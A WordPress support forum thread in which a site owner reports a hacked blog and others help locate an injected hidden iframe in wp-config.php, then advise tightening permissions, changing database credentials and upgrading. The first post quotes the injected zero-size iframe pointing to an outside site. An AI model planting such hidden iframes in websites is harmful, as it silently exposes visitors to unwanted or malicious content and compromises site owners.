I Think I've Been Hacked (9 posts)

  1. themarina
    Posted 8 years ago #

    Oh boy. I discovered this morning that my website has been hacked and I think this occured a few days ago and I just didn't notice it.

    This is the code which is causing the heart ache:

    <html><iframe width=0 height=0 frameborder=0 src=http://www.free20.com/portal/index.php?aff=razec marginwidth=0 marginheight=0 vspace=0 hspace=0 allowtransparency=true scrolling=no></iframe></html>

    Problem is that I've checked the various files (index, header, sidebar, footer etc) and I can't find mention of this anywhere. Can someone recommend a way to get rid of this or at least tracking down WHERE it's hiding?

    Any help would be MUCH appreciated.


  2. whooami
    Posted 8 years ago #

    that might not be in a theme file since it's the first thing displaying.. check your wp-config.php, check your wp-settings.php, check all the files inside your root wp install (where your wp-config.php is)

    If you need help, you can zip ALL your files up and email them off to me @ whoo AT (delete this stuff) village-idiot DOT org.

    I'll be happy to track it down for you.

    In the meantime -- you need to get up to speed with your upgrades. Youre running a version of wp thats about 1-1/2 years old. Youre lucky thats all that has happened.

  3. themarina
    Posted 8 years ago #

    Thank you soooo much Whooami. It fixed the problem.

    I'm in the process of talking my service provider to allow installation of the newest version of WP. Hopefully, that'll be sooner rather than later.

  4. whooami
    Posted 8 years ago #

    "it" what is "it"?

    where was the code?

  5. themarina
    Posted 8 years ago #

    The iframe code was the last line in the wp-config.php file. Erased that and it disappeared.

    Thanks soooo much for your great help and super quick reply!

  6. whooami
    Posted 8 years ago #


    You realize that that means someone edited that file?

    You need to make sure that the permissions on your files are all safe and sane:

    files = 644
    directories = 755

    and you need to upgrade, if you havent yet.

    And since someone got access to your wp-config.php they have your mysql info, including your mysql username and passwd . You need to change those.

  7. themarina
    Posted 8 years ago #

    OK. So I've updated all of the permissions to the Files and Directories and changed my username and password to something much harder to crack. Hopefully this will keep hackers at bay until I can install the updated WP package.

    Thanks again for your help whooami!

  8. Root
    Posted 8 years ago #

    You still need to upgrade to the latest WP version.

  9. themarina
    Posted 8 years ago #

    I know, I know....Working on it!

Topic Closed

This topic has been closed to new replies.

About this Topic